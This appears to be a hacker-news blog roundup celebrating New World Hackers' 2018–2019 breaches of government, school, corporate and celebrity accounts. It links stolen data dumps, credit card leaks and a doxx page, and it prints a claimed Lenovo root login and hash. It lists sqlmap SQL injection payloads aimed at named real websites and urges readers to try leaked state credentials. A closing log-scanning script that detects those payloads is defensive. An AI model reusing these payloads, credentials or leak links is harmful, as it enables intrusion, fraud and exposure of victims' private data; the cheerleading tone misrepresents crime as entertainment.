OurMine & Qurlla of New World Hackers Team Up To Hijack Twitter Accounts Belonging To International Celebrities

After a brief break from the hacking scene over recent months, it appears as though the “OurMine” hacking gang and “Qurlla” of New World Hackers are making a comeback of sorts – at least momentarily. I say this because last night both groups teamed up to hack the social accounts belonging to Shiamak Davar, a famous international choreographer who makes his home in India but has multiple Twitter accounts/handles across the US and Europe.

While one of his accounts was hacked and erased to feature the logo and name of OurMine, a separate account hijacked by Qurlla has essentially become his new de facto Twitter account – instantly giving him access to well over 53,000 fans internationally, lulz. To this effect, in the little over 24 hours since first hacking the accounts, Qurlla has been using the account to post a brief bio about himself and to release samples of his most recent hacks/leaks – whilst also monitoring all of Davar’s incoming notifications/messages. You can see this and more, along with the hacked account itself, via the link provided below – enjoy!

https://twitter.com/Qurlla/status/1119091622275207168

Screen Shots of Hacked Accounts:

Servers Belonging To Vermont’s Department of Financial Regulation Rooted, 41.48 Megabytes of Data Leaked Online

Late last night, January 27th 2019, a France-based hacker belonging to the New World Hackers group and going by the name of “Mizaru” announced a data dump of Vermont’s Department of Financial Regulation. The leak itself is too big to explain in a couple of brief sentences here, but what I can report is that approximately 41.48 Megabytes (MB) of data, comprising PHP 5.6.15 files and data from a 10.1.9-MariaDB database, were hacked/leaked online, and that the department’s servers were compromised via SQL injection vulnerabilities in URL parameters on the website’s back end.

Included in the leak is information tied to various banks affiliated with the Government of Vermont, including their unique IDs, code numbers, license numbers, issuance dates, company names, trade names and addresses. The leaked data also includes access to state registration files, along with the hashed passwords necessary to access them, as well as full copies of internal memos, emails, documentation and much more. Honestly, the leak is so big that it’s almost impossible to summarize all at once here, so you are just going to have to browse through the leak for yourself this time.

Site: hxxp://dfr.vermont.gov/
Location of SQL Database Dump: http://dfr.vt.gov/bishcain_drupal.sql
Download Site Databases (41.48 MB): https://anonfile.com/o983S6r4b8/dfr.vt.gov_txt

https://twitter.com/MZR_h4x0r/status/1089617826284032001

India’s Jamal Mohamed College Hacked by New World Hackers, Student Email Archives Dumped Online

Two nights ago, January 25th 2019, a member of the New World Hackers group going by the name of “Mizaru” claimed responsibility for the hack of Jamal Mohamed College in Khajanagar, Tiruchirappalli, India. Comprising over 3,200 lines, this is one of the largest data leaks I have ever seen Mizaru publish. This is partly because it contains the personal email messages/exchanges of hundreds of students, as well as a full database of university staff members – including their full names, positions, emails and contact information. On top of having their emails exposed, the hackers also managed to uncover and release even more student data, including their course catalogs, contact information and home addresses.

Browsing through the leak, it also becomes quite clear that Mizaru originally compromised the website via SQL injection, which granted administrator-level access/privileges over the entire site.

Target: hxxps://www.jmc.edu/
Data Leak: https://ghostbin.com/paste/96eg8

https://twitter.com/MZR_h4x0r/status/1088943913161932800

Kementerian Energi dan Sumber Daya Mineral Republik Indonesia & Sistema de Gestión SUMAR Hacked by New World Hackers

Yesterday morning, January 23rd 2019, two new members of New World Hackers going by the names of “Mizaru” and “Ftp” announced the hack and leak of two international Government agencies/departments. More specifically, the Ministry of Energy and Mineral Resources of the Republic of Indonesia (ESDM) and a branch of the Argentinian Ministry of Health known as Sistema de Gestión (SUMAR) were compromised in the breaches.

Once again however, just as with their hacks earlier this week, the leaked data is somewhat unconventional. Instead of leaking any data or information contained within the hacked databases, the hackers have chosen to leak the SQL vulnerabilities used to compromise the databases in the first place – essentially showing how the hack was carried out, either for others to replicate or for site administrators to patch.

Ministry of Energy and Mineral Resources: hxxp://tpdk.esdm.go.id
Vulnerabilities Leak: https://ghostbin.com/paste/kc6jo

Sistema de Gestión (SUMAR): hxxp://plannacer.larioja.gov.ar/
Vulnerabilities Leak:

https://twitter.com/MZR_h4x0r/status/1088037279627649024

https://twitter.com/MZR_h4x0r/status/1088112570421129216

Al1ne3737 & Mizaru Hack, Leak and/or Deface 6 Municipal Government Websites Across Brasil

To close out the work week, over the course of the last 48 hours various members belonging to the “New World Hackers” group announced the hack and/or leak and/or defacement of 8 websites across Brasil. To be more specific, implicated in the hacks/leaks featured below are the Town Hall of Pedra Azul, the Municipal Town Hall of Tocos do Moji, the Municipal Town Hall of Solidão, the Municipal Town Hall of Bezerros, the Municipal Town Hall of São José da Coroa Grande, the Intermunicipal Consortium of Environmental Sanitation – Midwest division, CÂMARA DE VEREADORES DE MATO CASTELHANO and the Municipal Water and Sewage Service of São Leopoldo (SEMAE). Two New World Hackers known as “Al1ne3737” and “Mizaru” have claimed responsibility for the breaches.

Exposed within the hack of CÂMARA DE VEREADORES DE MATO CASTELHANO are the login user names and passwords of two website administrators, granting access to two site databases containing information on site users, including telephone numbers, addresses, website user names and passwords, etc. In addition to the hack/leak, the website was also defaced; in fact, as of the evening hours of January 25th 2019, the website still remains defaced. Additionally, in a message attached to the hack, “Al1ne3737” stated: “The voice of none is stronger than the voice of one. Your website has been hacked because your security is very weak. Your website is vulnerable to SQL Injection, so please fix.”

Alvo: hxxp://camaramatocastelhano.rs.gov.br/
Leak: https://ghostbin.com/paste/7zqj8
Deface: http://www.zone-h.org/mirror/id/32159540?hz=1

Screen Shot of Deface:

Exposed in the leak of the Consórcio Intermunicipal de Saneamento Ambiental – Meio Oeste are the login email addresses and passwords of 3 website administrators, granting full access to the website’s back end – including 3 site databases. In a message attached to the hack, “Al1ne3737” sarcastically asked the rhetorical question “Do I Look Like Someone Who Has A Plan?” The website itself was also defaced and, as of the evening hours of January 25th 2019, still remains defaced. A screen shot of the deface is provided below.

Alvo: hxxp://cisam.sc.gov.br/
Leak: https://ghostbin.com/paste/m3htj
Deface: http://www.cisam.sc.gov.br/leis/al1ne3737.html

Screen Shot of Deface:

Most notably implicated in the leak of the Prefeitura de Pedra Azul are the user names, passwords and email addresses of 10 website administrators, including the site’s head webmaster – granting full access to the back end of the website and all of its contents.

Alvo: hxxp://www.pedraazul.mg.gov.br/
Leak: https://ghostbin.com/paste/h3k6o

Exposed in the leak of the Prefeitura Municipal de Tocos do Moji are the login user names and passwords of two site administrators, once again offering full access to the back end of the website and all of its content. The email addresses and federal CPF numbers of 5 other administrators can also be found in the leaked data provided below.

Alvo: hxxp://www.tocosdomoji.mg.gov.br/
Leak: https://ghostbin.com/paste/6pu5f

Exposed in the leak of the Prefeitura Municipal de Solidão are the personal email addresses and encrypted passwords of 19 politicians, used to log in to their official Government accounts through the municipality’s online web portal.

Alvo: hxxp://solidao.pe.gov.br/
Leak: https://ghostbin.com/paste/wq6k5

Exposed in the leak of the Prefeitura Municipal de Bezerros are the user names and passwords of two site administrators, granting access to a single site database attached to the website’s back end, containing information on all of the site’s PHP files as well as other miscellaneous information.

Alvo: hxxp://www.bezerros.pe.gov.br/
Leak: https://ghostbin.com/paste/oyeyb

Exposed in the leak of the Prefeitura Municipal de São José da Coroa Grande are the usernames and passwords of 6 website administrators, granting access to a single database containing information such as internal user logs, notices, calendars, telephone numbers, etc.

Alvo: hxxp://www.saojosedacoroagrande.pe.gov.br/
Leak: https://ghostbin.com/paste/rc8uz

Exposed within the hack of the Serviço Municipal de Água e Esgotos de São Leopoldo (SEMAE) are the emails, usernames and passwords of 5 website administrators, granting access to a database containing all of the company’s online information, including contacts, customer/client lists and internal documents/memos.

Alvo: hxxp://www.semae.rs.gov.br/
Leak: https://ghostbin.com/paste/cnn6j

Browse Through All The Leaks (PDF): https://roguemedia.co/wp-content/uploads/2019/01/NWH_Leaks.pdf

https://twitter.com/al1ne3737/status/1088480825287626755

https://twitter.com/al1ne3737/status/1088362937595691008

Hacker Doxxes Suspect To Avenge Leak of Brasilian Federal Police

In a move I have honestly never seen before, a hacker going by the name of “Sharp3” has managed to uncover the identity of another hacker going by the name of “Tr3v0r” – who was responsible for a hack and data leak affecting the Brasilian Federal Police earlier this morning. Not only this, but Sharp3 also personally took it upon himself to assemble screen shots of the leaked data, proof of authorship that Tr3v0r first hacked and leaked the information, as well as personal pictures exposing his real-life identity. Sharp3 then compiled the entirety of the information, loaded it onto a custom domain – see below – and hand-delivered the information to the inboxes of each of the 249 police officers exposed by this morning’s data breach – lulz.

It should go without saying, but this is a doxx the likes of which no one has ever seen before – which is what makes it newsworthy here today. It also adds to a recent trend over the last 3 weeks or so of different hackers being exposed by other hackers. For example, Sh4rpShooter of Pryzraky, Shizen of New World Hackers and Mr. Attacker of AnonGhost have all been exposed by rival hackers within the last two weeks alone.

Website Featuring Doxx of Tr3v0r: https://www.inocent.com.br/uploads/tr3v0r.php

Screen Shot from Doxx:

Qurlla of New World Hackers Begins Infecting IoT Devices with New, Never Before Seen, TrojanXENE Ransomware

This morning, January 14th 2019, “Qurlla” of New World Hackers essentially launched/invented a new form of ransomware attack that the world has never seen before. Unlike traditional ransomware attacks, which first require a user to click on a hyperlink and/or download a file, this ransomware is being spread via open ports on devices located on the Internet of Things (IoT).

Traditionally, the IoT has been used to build botnets for Bitcoin mining or DDoS attacks, essentially using malware that crawls different networks to infect any vulnerable devices on them. However, Qurlla appears to have coded a new piece of malware that scans for vulnerable devices on the Internet of Things and delivers the ransomware directly through open ports exposed by their software – requiring no action from the device or its user whatsoever. Essentially, these devices are being infected simply by existing dormantly on the IoT – something which, at least to my knowledge, no one has ever pulled off before.

https://twitter.com/Qurlla/status/1084880048799342596

To date, Qurlla claims to have compromised approximately 214,003 devices found through a web service known as Shodan, the self-described “Search Engine for The Internet of Things,” infecting at least 150,000 with his ransomware – including TVs, laptops, PCs and Raspberry Pi servers. He has also targeted Amazon Echo devices, printers and cell phones. In statements to Rogue Media Labs, Qurlla explained that this is only the beginning, and that he is still actively developing his source code – which will remain private until at least next month. For the time being, Qurlla is going to keep building upon his code – perhaps introducing a DDoS variant into the mix, allowing infected devices to coordinate with one another to carry out DDoS attacks in the future.

While it is still very early and the attack was only launched a few hours ago, Qurlla says that he has already made over $300 from infected victims – asking $150 apiece to decrypt his ransomware. Qurlla calls his new ransomware “TrojanXENE,” a custom-coded trojan which uses Ruby code to send TCP payloads and header redirects from a Google API – affecting devices found on Shodan, using its API to send the payloads and get a response. To exploit the printers, Qurlla used CastHack source code from “HackerGiraffe,” modifying the payloads to deliver his variant.

Qurlla details that he uses a “simple SHA-1” to encrypt the devices, “but every payload is tweaked to pull off the attack” – depending on the type of device compromised. He explains how he “did code like a gui in C# earlier, but it wasn’t as efficient as just executing python commands in terminal to make this possible. There is really a mix of programming languages.” Upon turning on or accessing their device, users are greeted with a message stating “You got Hacked” – which then redirects them to a BTC payment gateway. Reportedly, users are not able to do anything on their devices until a payment of $150 is made. Below is a screen shot of the message left behind on infected devices.

Screen Shot from Infected IoT Device:

https://twitter.com/Qurlla/status/1084839749746126849

Batticaloa Municipal Council of Sri Lanka Hacked, Site Databases Leaked Online

Shortly after New Year’s 2019, hackers “Shizen” and “Ftp” announced a hack of the Batticaloa Municipal Council in Sri Lanka. While the leak contains some 760 lines, most notably the hackers were able to uncover the personal information of 22 website administrators, including their usernames, email addresses, phone numbers and full passwords – theoretically granting anyone access to the back end of the website. Also included in the leaked databases is personal information on 100 Municipal Council members, including their full names, addresses, emails, ID numbers, passwords, phone numbers and usernames.

Website Affected: hxxp://batticaloa.mc.gov.lk
Raw Leak: https://ghostbin.com/paste/r5s4d

Examples:

https://twitter.com/__sh1z3n/status/1080216837873459201

East Sac Community School District Hacked, Databases Leaked Online

Last night “Shizen” and “Ftp” of New World Hackers announced a hack of East Sac Community School District in Lake View, Iowa, allowing the group to gain remote access to several site databases before compiling and ultimately dumping the information online. In a press release made available to the public through Ghostbin, Shizen explains how they were able to hack the website through several SQL injection vulnerabilities, granting them access to PHP 5.6.23 files hosted with a MySQL database on the Nginx web server of a WordPress website.

Parameter: id (GET)

Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=7 AND 1973=1973

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY, or GROUP BY clause (FLOOR)
Payload: id=7 AND (SELECT 4390 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=7 AND SLEEP(5)

Exposed within the leak are the exact vulnerabilities affecting the site and the payloads delivered to compromise it, as well as the root admin username and password. You can also find the contact information of various school employees/administrators, including full names, positions, email addresses and phone numbers, as well as the login user names, emails and hashed passwords of various site administrators.

Website Hit: hxxp://eastsac.k12.ia.us/
Raw Leak: https://ghostbin.com/paste/hwpf2

https://twitter.com/__sh1z3n/status/1079928590517657601?s=19

Lenovo Website Servers Haxxed, Data of +1 Million Users Compromised by New World Hackers

Just before the new year broke, Eastern Standard Time, “Qurlla” of New World Hackers announced a major leak of Lenovo web servers, releasing what was perhaps the single largest data dump I have ever seen. According to the hackers behind the leak, even after the initial leak was posted online, downloads from the website were still ongoing.

According to Qurlla, Lenovo’s web servers were originally compromised via SQL injection through an outdated product ID number, meaning that the hackers found a product ID online which accidentally led them to an error page. Then, using this error page, the hackers proceeded to enter a series of query strings, ultimately granting them full administrator-level access over the website and all its contents – allegedly over 20 GB of data.

According to the estimates of the hackers involved in the breach, over 127,000 customers were affected and over 1 million registered users exposed. Browsing through the different tables attached to the leaks, you can find information such as payment providers and plans, access to the website’s video files, chatroom and registered email users, as well as their email exchanges/messages with Lenovo staff. You can find the shipping addresses of customers, order numbers, password history, customer account login information, mailing lists and much more. You can even find a list of IP addresses blacklisted by the website – nearly 2,000 lines of data in total, comprising access to dozens of databases and hundreds of folders/tables.

Database IP: 66.147.244.90

Website Login: https://lenovo.com/us/en/login
Root Login Username: Lenovo
Password: 070928ee0c13fa61708001bda30fff23

Database Download (27.03 KB): https://anonfile.com/A2sfxapab2/dumps.txt_zip
Credit Cards Stolen: https://ghostbin.com/paste/3nh4x

https://twitter.com/Qurlla/status/1079919133930737664?s=19

Texas.gov & Florida.gov Hacked by New World Hackers, Access To Various Databases Leaked Online

This afternoon, December 31st 2018, “Qurlla” of New World Hackers announced the breach of two databases tied to the States of Florida and Texas. The first hack targeted the state website of Florida, exposing information on what appear to be either various state contractors or employees, including their names, addresses, emails and phone numbers – roughly 1,066 lines of data. The second leak affected the state website of Texas and contains much more detailed/sensitive information, including 83 website administrators’ full names, email addresses, user login names and passwords. Additional information leaked from the site exposes the site’s user database contents, as well as video files.

In a message to Rogue Media Labs, Qurlla explained that his group was able to hack both websites via SQL injection, presumably through a vulnerability tied to the sites’ back end. However, the exact URLs affected or payloads delivered were not disclosed online. Additionally, and perhaps most importantly, Qurlla did tag the states of Texas and Florida in the leak, meaning that there is no discernible timetable as to how long the credentials exposed online will remain valid – if you were interested in poking around, that is 😉.

Websites Targeted:

hxxp://texas.gov/
hxxp://florida.gov/

Texas.gov Leak: https://ghostbin.com/paste/ceeom
Florida.gov Leak: https://ghostbin.com/paste/zaq2y

https://twitter.com/Qurlla/status/1079827887610626048

https://twitter.com/Qurlla/status/1079760430703280128

Agência de Tecnologia da Informação do Piauí Hacked by Shizen & Ftp

Just before the start of the new year, December 31st 2018, hackers “Shizen” and “Ftp” of New World Hackers announced a joint hack of the Information Technology Agency of Piauí, Brasil, managing to leak online the contents of databases tied to the Hematology and Hemotherapy Center of Piauí. Having covered Shizen many times in the past, this appears to be the first hack carried out under the banner of New World Hackers, after previously conducting hacks on behalf of Pryzraky – perhaps indicating a change of teams or allegiances.

Regardless, to serve as proof of the hack, in a data dump posted to Twitter this morning the hackers posted a mirror of the site’s contents – 21 different databases in all. Analyzing the hack, it appears as though the group was able to gain remote access to site databases through a multitude of SQL injection vulnerabilities left unaddressed by the site’s security architects, ultimately granting the hackers access to PHP 5.3.3 files, attached to a MySQL 5.0 database hosted on an Apache 2.2.16 web server. In another surprise move, Shizen even released the exact vulnerabilities exploited and payloads delivered within the leak itself – something normally redacted or kept private.

For Example, Here are The 4 SQL Vulnerabilities Implicated:

Website Hit: hxxp://hemopi.pi.gov.br/

Vulnerability 1: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=13' AND 7214=7214 AND 'aWjt'='aWjt

Vulnerability 2: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=13' AND (SELECT 8268 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(8268=8268,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lEbP'='lEbP

Vulnerability 3: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=13' AND SLEEP(5) AND 'ouoQ'='ouoQ

Vulnerability 4: UNION query
Title: Generic UNION query (NULL) – 4 columns
Payload: id=13' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a767071,0x78547676494a654761784744686253746e706c6f6a6a57526655576a6e6863626866495874446f56,0x716a716a71)-- EKMl

Raw Database Leak: https://ghostbin.com/paste/6w4ok
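The two sqlmap listings on this page (the East Sac entry and the four Piauí payloads above) show what these probes look like on the wire, which is also what a defender can key on in web server logs. The script below is an added example, not code from the original post or from anyone it names: it parses constructed Apache/Nginx combined-format access log lines (placeholder client IPs and the log format are assumptions), percent-decodes each query parameter, and tags values that match the four technique families sqlmap reports. The patterns are my own and are anchored on SQL syntax rather than on the scanner's user-agent string, which is trivial to change.

```python
"""Flag sqlmap-style SQL injection probes in web server access logs.

Added example (not from the original post). Log lines are constructed; the
client IPs and the combined log format are assumptions.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlencode, urlsplit

# One pattern per technique family named in the leaked sqlmap output:
# boolean-based blind, error-based (FLOOR/RAND), time-based blind (SLEEP), UNION query.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|\b(?:EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "time-based blind": re.compile(
        r"\b(?:SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

# Request line inside a combined-format entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"')


def classify(value):
    """Return the technique families whose signature appears in one parameter value."""
    # parse_qsl already decoded once; decoding again catches a double-encoded payload (%2527).
    text = unquote_plus(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def parse_request(line):
    """Return (client ip, [(name, decoded value), ...]) or None for a malformed line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    client_ip = line.split(" ", 1)[0]
    query = urlsplit(m.group(1)).query
    return client_ip, parse_qsl(query, keep_blank_values=True)


def scan_log(lines):
    """One finding per (line, parameter) whose value matches at least one signature."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        parsed = parse_request(line)
        if parsed is None:
            continue
        client_ip, params = parsed
        for name, value in params:
            hits = classify(value)
            if hits:
                findings.append({"line": lineno, "ip": client_ip,
                                 "param": name, "techniques": hits})
    return findings


def make_line(client_ip, params, agent, status):
    """Build a constructed combined-format log line; urlencode() percent-encodes the
    parameter values the way a browser or scanner would send them."""
    return (f'{client_ip} - - [31/Dec/2018:22:14:01 +0000] '
            f'"GET /index.php?{urlencode(params)} HTTP/1.1" {status} 512 "-" "{agent}"')


# Constructed sample log: one benign request, the four probe shapes from the leaked
# sqlmap output (UNION hex literal shortened), and a benign search term containing
# the word "union" to show the word-boundary check holds.
SAMPLE_LOG = [
    make_line("198.51.100.7", {"id": "7"}, "Mozilla/5.0", 200),
    make_line("198.51.100.7", {"id": "7 AND 1973=1973"}, "sqlmap/1.2.12", 200),
    make_line("198.51.100.7", {"id": "13' AND SLEEP(5) AND 'ouoQ'='ouoQ"}, "sqlmap/1.2.12", 200),
    make_line("198.51.100.7", {"id": "13' UNION ALL SELECT NULL,NULL,NULL,"
                               "CONCAT(0x716a767071,0x78,0x716a716a71)-- EKMl"}, "sqlmap/1.2.12", 200),
    make_line("198.51.100.7", {"id": "7 AND (SELECT 4390 FROM(SELECT COUNT(*),CONCAT(0x7170716271,"
                               "(SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x "
                               "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"}, "sqlmap/1.2.12", 500),
    make_line("203.0.113.9", {"q": "the union of selected sets"}, "Mozilla/5.0", 200),
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} param={f['param']} -> {', '.join(f['techniques'])}")
```

Run against the constructed sample, lines 2 through 5 are flagged as boolean-based, time-based, UNION and error-based respectively, while the plain `id=7` request and the "union of selected sets" search are not. Decoding happens before matching because a scanner sends `'` as `%27` and `(` as `%28`; a rule that runs on the raw request line would miss every one of these. In a real deployment the same findings, grouped by client IP and parameter name, are what you would alert on and then compare against the application's own parameter handling (prepared statements remove the underlying bug; this only tells you someone is looking for it).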

https://twitter.com/__sh1z3n/status/1079589738355531777